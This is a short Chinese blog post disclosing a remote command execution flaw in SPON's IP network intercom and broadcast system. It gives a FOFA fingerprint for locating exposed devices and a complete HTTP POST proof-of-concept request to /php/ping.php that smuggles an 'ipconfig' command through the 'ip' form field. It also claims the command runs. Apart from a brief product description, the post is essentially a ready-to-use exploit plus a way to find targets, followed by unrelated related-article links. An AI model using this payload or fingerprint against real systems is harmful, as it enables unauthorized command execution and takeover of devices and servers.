当前位置: 首页 > article >正文

世邦通信股份有限公司IP网络对讲广播系统RCE

漏洞描述

SPON世邦IP网络广播系统采用的IPAudio™技术, 将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输的双向音频扩声系统。传统广播系统存在的音质不佳,传输距离有限,缺乏互动等问题。该系统设备使用简便,只需将终端接入计算机网络即可构成功能强大的数字广播系统,每个接入点无需单独布线,实现计算机网络、数字视频监控、公共广播的多网合一。其存在RCE漏洞,攻击者可通过此漏洞执行系统命令,进而控制服务器

漏洞复现

FOFA

icon_hash="-1830859634"

POC

POST /php/ping.php HTTP/1.1
Host:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

jsondata%5Btype%5D=123&jsondata%5Bip%5D=ipconfig

bp 成功执行命令


http://www.kler.cn/news/331798.html

相关文章:

  • 线程池的实现和讲解:解决多线程并发服务器创建销毁线程消耗过大的问题
  • [Web安全 网络安全]-XXE 外部实体注入攻击XML
  • UbuntuServer22.04.4安装Docker Compose
  • 云计算Openstack Swift
  • 数据结构(栈和队列的实现)
  • wordpress重置密码的方法
  • chatgpt学术科研prompt模板有哪些?chatgpt的学术prompt有哪些?学术gpt,学术科研
  • SpringBoot实战:构建学科竞赛管理系统
  • QCamera6.7笔记
  • git 基本原理
  • 【网络安全】公钥基础设施
  • 时尚界的技术革新:Spring Boot与“衣依”服装销售
  • Docker安装mysql8并配置主从复制
  • 商家营销工具架构升级总结
  • 初识TCP/IP协议
  • 代码随想录打卡Day46
  • 搭建k8s集群服务(kubeadm方式)
  • 招联金融秋招内推2025
  • java-快速将普通main类变为javafx类,并加载自定义fxml
  • Docker面试-24年